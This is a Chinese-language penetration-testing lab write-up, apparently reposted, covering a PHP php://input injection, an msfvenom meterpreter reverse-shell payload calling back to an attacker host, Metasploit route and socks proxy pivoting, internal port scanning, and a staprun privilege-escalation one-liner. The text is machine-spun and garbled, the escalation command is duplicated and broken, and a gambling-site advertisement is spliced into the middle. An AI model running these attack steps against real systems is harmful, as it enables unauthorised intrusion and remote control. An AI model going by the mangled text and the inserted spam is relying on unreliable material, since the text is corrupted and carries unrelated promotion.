一开始的时刻对整个内网的拓扑结构还不熟,以是做的时刻有许多方式都没有想到去用,人人多多指教。
一、环境准备二、渗透详细流程总览拓扑图用网线毗邻交换机
设置Winodwss攻击机IP为172.16.6.203
攻击机Kali IP为172.16.6.202
主机IP为172.16.6.201
网关为172.16.6.1
子网掩码255.255.255.0
目的IP 172.16.6.10
一开始以为192.168.6.200,一台通俗的双网卡主机,没有发现是防火墙,以是10.1.1.0网段的主机拓扑不够清晰,厥后先生讲了才知道,防火墙做了端口映射。E主机的445端口映射到防火墙445端口,F主机的3389端口映射到防火墙的3389端口。
接见主页。发现伪协议注入点。
http://172.16.6.10/index.php?page=php://input
使用菜刀毗邻,菜刀版本需2020年的版本。
2、天生并上传木马且回连meterpreter查看phpinfo目的主机为Linux系统的主机。
Msf天生木马msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.6.147 LPORT=2337 -f elf -a x86 —platform linux -o /home/hula.elf
并use exploit/multi/handle模块监听木马回连情形。
将木马通过菜刀上传木马,赋予运行权限,然后执行。
发现回连到meterpreter。
3、内网信息 *** (同时添加路由并确立socks署理)ipconfig查看网卡信息,发现有两个网段的IP,分别为172.16.6.10和192.168.6.10。
自动添加路由run post/multi/manage/autoroute。
,,www.huangguan.us是一个提供皇冠 *** APP下载、皇冠会员APP下载、皇冠体育最新登录线路、新2皇冠网址的的体育平台。新皇冠体育官网是多年来值得广大客户信赖的平台,我们期待您的到来!
添加路由与署理:
use auxiliary/server/socks4a
show options
set srvhost 172.16.6.147
set srvport 1080
使用portscan模块举行端口扫描
search portscan
set rhosts 192.168.6.0/24。
ipconfig查看网卡信息,发现有两个网段的IP,分别为172.16.6.10和192.168.6.10
给msf添加192.168.6.10段的路由,run autoroute -s 192.168.6.0/24
添加署理:
use auxiliary/server/socks4a
show options
srvhost设为本机
srvport默认1080
可以看到扫描出15、16、17、200四台主机,端口开放情形为
192.168.6.15 21/22
192.168.6.16 22/80/3306/8080
192.168.6.17 22/80/3306
192.168.6.200 80/135/445/3389
4、实验本机提权用一句话提权
printf “install uprobes /bin/sh” > exploit.conf; MODPROBE_OPTIONS=”-C exploit.conf” staprun -u whatever exploit.conf” staprun -u whatever> exploit.conf; MODPROBE_OPTIONS=”-C
转载声明:本站发布文章及版权归原作者所有,转载本站文章请注明文章来源!
网友评论